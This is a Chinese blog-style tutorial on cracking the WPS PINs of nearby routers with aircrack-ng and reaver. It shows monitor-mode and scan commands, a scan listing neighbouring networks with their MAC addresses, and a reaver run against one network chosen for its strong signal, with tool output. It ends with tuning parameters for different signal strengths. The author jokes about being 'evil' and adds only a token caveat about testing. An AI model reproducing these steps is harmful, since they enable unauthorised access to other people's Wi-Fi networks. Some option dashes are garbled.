aircrack和reaver破解路由器PIN码

使用 aircrack，寻找附近开启wps的路由器，邪恶……嘻嘻

airmon-ng start wlan0
airodump-ng mon0

CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                     
 00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    <length:  0>                                                                                                              
 4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1                                                                                                                   
 B0:48:7A:52:F4:72  -23       42        0    0   1   WPA2 CCMP   PSK  FAST_52F472                                                                                                               
 8C:21:0A:5F:A2:FA  -35       28        0    0   1  WPA2 CCMP   PSK  TP-LINK_5FA2FA                                                                                                            
 E0:05:C5:D3:3F:00  -42       33        0    0   2   WPA2 CCMP   PSK  TP-LINK_D33F00                                                                                                            
 EC:17:2F:7D:12:1E  -49       56        1    0   6   WPA2 CCMP   PSK  wg7788                                                                                                                    
 B0:48:7A:5D:22:EA  -51       36        0    0   6  WPA2 CCMP   PSK  TP-LINK_1202

使用reaver 破解开启wps功能的路由器密码

比如这条，信号还不错

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA
root@home:~/soft/reaver-1.4#  reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>[+] Switching mon0 to channel 1[+] Waiting for beacon from 8C:21:0A:5F:A2:FA[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response

这样就开始破解了哦，耐心等待结果就好了……不要太邪恶哦。做做测试还是可以的，要做个好童鞋……

##########################################################################

附上reaver调整参数的一些小技巧
reaver:

-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key（可以提高PJ速度）
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 （非TP-LINK路由推荐�Cd9 �Ct9参数防止路由僵死
示例：
reaver -i mon0 -b MAC -a -S �Cd9 �Ct9 -vv）
应因状况调整参数（-c后面都已目标频道为1作为例子）
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

注：54e后面有点（.）的是开了wps。但是这个要多试几次才准。可以先用Qss软件测试一下

        现在的新版路由器已经加入防PING功能，，，而且默认关闭了WPS，，，WPS时代即将过去。。。。